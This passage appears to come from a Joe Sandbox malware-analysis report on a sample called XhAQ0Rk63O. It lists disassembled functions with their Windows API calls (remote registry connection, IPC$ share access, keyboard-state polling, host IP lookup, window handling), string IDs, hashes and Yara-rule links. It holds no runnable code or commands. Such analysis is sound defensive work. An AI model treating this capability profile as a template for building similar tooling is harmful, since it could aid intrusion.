                                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                          • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                          • API String ID: 3052893215-4176887700
                                                                                          • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                          • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                          • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                          • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                          Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                          • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                            • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                          • String ID: Version$\TypeLib$interface\
                                                                                          • API String ID: 656856066-939221531
                                                                                          • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                          • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                          • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                          • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                          Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                          • __swprintf.LIBCMT ref: 0045E6EE
                                                                                          • _printf.LIBCMT ref: 0045E7A9
                                                                                          • _printf.LIBCMT ref: 0045E7D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString_printf$__swprintf_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3590180749-2354261254
                                                                                          • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                          • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                          • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                          • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                          Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • _memset.LIBCMT ref: 00458194
                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 2255324689-22481851
                                                                                          • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                          • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                          • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                          • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                          Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                          • __wcsicoll.LIBCMT ref: 004585D6
                                                                                          • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                          • String ID: ($interface$interface\
                                                                                          • API String ID: 2231185022-3327702407
                                                                                          • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                          • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                          • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                          • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                          Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                          • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                          • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                          • _wcscpy.LIBCMT ref: 004365F5
                                                                                          • WSACleanup.WSOCK32 ref: 004365FD
                                                                                          • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                          • _strcat.LIBCMT ref: 0043662F
                                                                                          • _wcscpy.LIBCMT ref: 00436644
                                                                                          • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                          • _wcscpy.LIBCMT ref: 00436666
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                          • String ID: 0.0.0.0
                                                                                          • API String ID: 2691793716-3771769585
                                                                                          • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                          • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                          • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                          • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                          Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                            • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                            • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                          • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                          • __lock.LIBCMT ref: 00416B8A
                                                                                          • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                          • __lock.LIBCMT ref: 00416BAB
                                                                                          • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                          • API String ID: 1028249917-2843748187
                                                                                          • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                          • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                          • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                          • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                          Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                          • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                          • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                          • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                          • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CharNext
                                                                                          • String ID:
                                                                                          • API String ID: 1350042424-0
                                                                                          • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                          • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                          • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                          • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                          Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                          • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                          • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                          • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                          • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                          • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                          • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                          • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                          • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                          • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                          Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                          • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                          • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                          • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                          • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                          • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                          Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 136442275-0
                                                                                          • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                          • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                          • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                          • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                          Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 535477410-2761332787
                                                                                          • Opcode ID: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
                                                                                          • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                          • Opcode Fuzzy Hash: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
                                                                                          • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                          Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                          • _wcslen.LIBCMT ref: 00460502
                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                          • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 4123061591-1241985126
                                                                                          • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                          • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                          • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                          • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                          Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                            • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                            • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                          • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                          • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
